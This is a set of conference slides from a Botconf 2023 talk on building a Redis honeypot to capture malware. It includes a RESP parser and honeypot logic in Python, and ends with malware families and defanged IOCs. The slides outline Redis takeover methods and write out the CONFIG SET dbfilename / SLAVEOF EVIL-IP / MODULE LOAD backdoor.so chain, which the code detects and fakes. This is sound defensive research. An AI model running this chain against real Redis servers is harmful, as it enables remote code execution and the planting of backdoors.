BOTCONF 2023 - @yarienkiva

Build your own Redis honeypot

whoami

  • Aloïs "Alol" de Souza-Coroller
  • @yarienkiva
  • Malware Analyst @CERT La Poste
  • HeroCTF organiser
  • https://heartathack.club

HeroCTF

12 - 14 / 05

https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware

Redis

Open source, in-memory data store used by millions of developers as a database, cache, streaming engine, and message broker.

"Designed to be totally insecure if exposed to the outside world." - antirez

Python

>>> pydict['key'] = 'value'
>>> pydict.get('key')
value

Redis

127.0.0.1:6379> set key value
OK
127.0.0.1:6379> get key
"value"

Serialization in Redis

*2\r\n$6\r\nHello,\r\n$11\r\nBotconf2023\r\n
*2     : number of elements (words) in the array
$6     : length in bytes of the next word
Hello, : the word itself
...    : same pattern for every remaining word ($11, Botconf2023)
Hello, Botconf2023
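As an added example (not code from the talk or from Redis), here is a small RESP codec that decodes the line above and encodes commands the way redis-cli sends them. The names encode_command, decode and parse_words are mine; it goes slightly beyond the slide by handling the other RESP2 reply types a honeypot has to produce (+simple strings, -errors, :integers, $-1 null) and by refusing a bulk string whose declared length does not match the bytes that follow.

```python
"""Minimal RESP (REdis Serialization Protocol) codec.

Added example for the serialization slide; not code from the talk or from Redis.
Covers the five RESP2 types a honeypot needs to read a client's command and
answer it: arrays (*), bulk strings ($), simple strings (+), errors (-), integers (:).
"""

CRLF = b"\r\n"


class RespError(ValueError):
    """Raised on malformed input (bad prefix, length mismatch, truncation)."""


def encode_command(*words: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, as redis-cli does."""
    out = b"*%d\r\n" % len(words)
    for w in words:
        raw = w.encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out


def _read_line(data: bytes, pos: int) -> tuple:
    """Return (bytes up to the next CRLF, position just after that CRLF)."""
    end = data.find(CRLF, pos)
    if end == -1:
        raise RespError("truncated: no CRLF")
    return data[pos:end], end + 2


def decode(data: bytes, pos: int = 0):
    """Decode one RESP value starting at `pos`; return (value, next_pos)."""
    if pos >= len(data):
        raise RespError("truncated: empty input")
    prefix = data[pos:pos + 1]
    line, pos = _read_line(data, pos + 1)
    if prefix == b"+":                      # simple string, e.g. +OK
        return line.decode(), pos
    if prefix == b"-":                      # error reply, e.g. -ERR unknown command
        return RespError(line.decode()), pos
    if prefix == b":":                      # integer
        return int(line), pos
    if prefix == b"$":                      # bulk string: length, then the raw bytes
        n = int(line)
        if n == -1:                         # $-1 is the null bulk string
            return None, pos
        if pos + n + 2 > len(data):
            raise RespError("truncated bulk string")
        if data[pos + n:pos + n + 2] != CRLF:
            raise RespError("declared length does not match data")   # e.g. $5 for "Hello,"
        return data[pos:pos + n], pos + n + 2
    if prefix == b"*":                      # array: count, then that many values
        n = int(line)
        if n == -1:
            return None, pos
        items = []
        for _ in range(n):
            item, pos = decode(data, pos)
            items.append(item)
        return items, pos
    raise RespError("unknown prefix %r" % prefix)


def parse_words(data: bytes) -> list:
    """Decode a client command and return its words as text, e.g. ['set', 'key', 'value']."""
    value, _ = decode(data)
    if not isinstance(value, list):
        raise RespError("expected an array")
    return [w.decode() for w in value]


if __name__ == "__main__":
    wire = b"*2\r\n$6\r\nHello,\r\n$11\r\nBotconf2023\r\n"    # the slide's example
    print(parse_words(wire))
    print(encode_command("set", "key", "value"))
```

The length check matters more for a honeypot than for a normal client: whatever connects to port 6379 gets to choose every byte, so a `$` count that disagrees with the data that follows is treated as a protocol error rather than silently read past.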

How to pwn a Redis

  • Lua sandbox escape (or other CVE)
  • config set + ssh key/webshell/crontab
  • SLAVEOF + MODULE LOAD

SLAVEOF + MODULE LOAD

set dbfilename backdoor.so

REPLCONF (sync malicious RDB)

MODULE LOAD backdoor.so

SLAVEOF EVIL-IP

Inner workings

if attack:                   # SLAVEOF / REPLCONF / MODULE LOAD chain spotted
    save_binary()            # keep the synced file: that's the "free malware"
    return fake_result       # pretend it worked so the bot keeps talking
else:
    return redis_result      # otherwise relay what the real Redis answered
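The pseudocode above spelled out as working Python, as an added example that is not the talk's code. It keys on the command chain listed on the "How to pwn a Redis" / "SLAVEOF + MODULE LOAD" slides (CONFIG SET dbfilename, SLAVEOF/REPLICAOF, REPLCONF, MODULE LOAD), answers those with a fake +OK, records an event, and hands everything else to a backing store. Assumptions of mine: commands arrive already parsed into a list of words, the backing store is an in-memory dict standing in for the real Redis a deployment would proxy to, the payload passed to save_binary is whatever the honeypot received over the replication sync, and "SLAVEOF NO ONE" is treated as benign since it only stops replication.

```python
"""Decision logic of a Redis honeypot, written out from the slide's pseudocode.

Added example, not code from the talk. Benign commands go to a stand-in backend
(assumption: a real deployment proxies them to a real Redis); commands from the
SLAVEOF + MODULE LOAD chain get a fake success and are logged as events.
"""
import hashlib
import tempfile
import time
from pathlib import Path
from typing import Callable, Optional

Command = list  # a parsed command: list of str, e.g. ["set", "key", "value"]


# --- RESP replies --------------------------------------------------------
def ok() -> bytes:
    return b"+OK\r\n"


def bulk(value: Optional[str]) -> bytes:
    if value is None:
        return b"$-1\r\n"                          # null bulk string
    raw = value.encode()
    return b"$%d\r\n%s\r\n" % (len(raw), raw)


def err(msg: str) -> bytes:
    return b"-ERR %s\r\n" % msg.encode()


# --- stand-in for the real Redis (the "redis_result" branch) -------------
def make_backend() -> Callable[[Command], bytes]:
    store: dict = {}

    def backend(cmd: Command) -> bytes:
        name = cmd[0].upper() if cmd else ""
        if name == "PING":
            return b"+PONG\r\n"
        if name == "SET" and len(cmd) == 3:
            store[cmd[1]] = cmd[2]
            return ok()
        if name == "GET" and len(cmd) == 2:
            return bulk(store.get(cmd[1]))
        return err("unknown command '%s'" % name.lower())

    return backend


class Honeypot:
    def __init__(self, quarantine: Path, backend: Callable[[Command], bytes]):
        self.quarantine = quarantine      # where synced binaries are kept for analysis
        self.backend = backend
        self.events: list = []            # one record per attack-stage command / binary

    @staticmethod
    def classify(cmd: Command) -> Optional[str]:
        """Name the attack stage a command belongs to, or None if it looks benign."""
        words = [w.upper() for w in cmd]
        if words[:2] == ["CONFIG", "SET"] and len(words) > 2 and words[2] in ("DIR", "DBFILENAME"):
            return "config_set"           # choosing where the dumped file will land
        if words[:1] in (["SLAVEOF"], ["REPLICAOF"]):
            if words[1:] == ["NO", "ONE"]:
                return None               # only stops replication: not part of the chain
            return "slaveof"              # pointing us at an attacker-controlled master
        if words[:1] == ["REPLCONF"]:
            return "replconf"
        if words[:2] == ["MODULE", "LOAD"]:
            return "module_load"          # a real Redis would dlopen the .so here
        return None

    def handle(self, peer: str, cmd: Command) -> bytes:
        """The if/else from the slide: fake success for attack stages, else the real answer."""
        stage = self.classify(cmd)
        if stage is None:
            return self.backend(cmd)
        self.events.append({"ts": time.time(), "peer": peer, "stage": stage, "cmd": cmd})
        return ok()                       # never let the bot see a failure

    def save_binary(self, peer: str, data: bytes) -> str:
        """Store what the fake master sent during the sync, content-addressed by SHA-256."""
        digest = hashlib.sha256(data).hexdigest()
        self.quarantine.mkdir(parents=True, exist_ok=True)
        (self.quarantine / digest).write_bytes(data)
        self.events.append({"ts": time.time(), "peer": peer, "stage": "binary", "sha256": digest})
        return digest


def demo() -> dict:
    """Replay a constructed session (not a real capture) through the honeypot."""
    pot = Honeypot(Path(tempfile.mkdtemp()) / "quarantine", make_backend())
    peer = "198.51.100.7:41234"           # RFC 5737 documentation address, constructed
    replies = [
        pot.handle(peer, ["PING"]),
        pot.handle(peer, ["set", "key", "value"]),
        pot.handle(peer, ["get", "key"]),
        pot.handle(peer, ["config", "set", "dbfilename", "backdoor.so"]),
        pot.handle(peer, ["slaveof", "198.51.100.9", "6379"]),
        pot.handle(peer, ["module", "load", "./backdoor.so"]),
        pot.handle(peer, ["slaveof", "no", "one"]),
    ]
    # the sync payload a deployment would receive from the fake master; constructed bytes here
    digest = pot.save_binary(peer, b"\x7fELF constructed placeholder, not a real module")
    return {"replies": replies, "stages": [e["stage"] for e in pot.events], "sha256": digest}


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Saving under the hash rather than the name the bot asked for (backdoor.so) means two campaigns dropping different files with the same name never overwrite each other, and the event log ties each stage back to the peer address, which is what ends up on the IOCs slide.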

Results

The honeypot was pushed to prod this morning at 3AM so I haven't had the time to get any interesting results (or sleep), so ...

Free malware!

Results

Kiss-a-dog:
    - Coinminer
    - Tsunami (Backdoor)
    - Backdoor SSH
    - Diamorphine (Rootkit)

Watchdog:
    - Coinminer
    - SSH worm

IOCs

101.43.24.117
106.13.235.167
112.80.35.83
114.112.64.172
117.41.165.40
122.195.53.54
124.221.215.245
150.158.212.175
155.230.135.140
175.178.236.77
180.76.140.118
36.7.69.118
42.193.122.54
43.143.138.177
43.143.31.67
61.144.20.252
66.23.237.139
81.69.196.144
84.201.183.176
hxxp[://]s[.]na-cs[.]com/
hxxp[://]oracle[.]zzhreceive[.]top/
hxxp[://]kiss[.]a-dog[.]top
hxxp[://]45[.]83[.]123[.]29/
hxxp[://]en2an[.]top/

c85a554b87aa138e54d646dadde08854dfc461bc
67e05c827ce3e92d394b1f750ab227f222aa505f
1e3f5965bedb8562ac13a487ce956983ecd7cf0c

Thanks for listening

@yarienkiva - Aloïs - CERT La Poste
La Poste recrute ;)

See you next year !

@yarienkiva - Aloïs - CERT La Poste
La Poste recrute ;)

SHOUTBOX :
- HeroCTF V5 12-14/05
- LT done, plz don't fire me Christophe

- Fumiko plz post more music on twitter

honeypot_redis

By Alol dSC
